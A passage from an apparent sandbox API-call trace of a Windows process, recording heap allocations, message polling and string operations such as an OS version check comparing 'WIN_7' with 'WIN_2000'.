dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.907] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.909] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.910] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0255.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.912] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.913] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.913] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.914] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.915] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.915] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0255.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0255.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0255.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0255.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0255.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 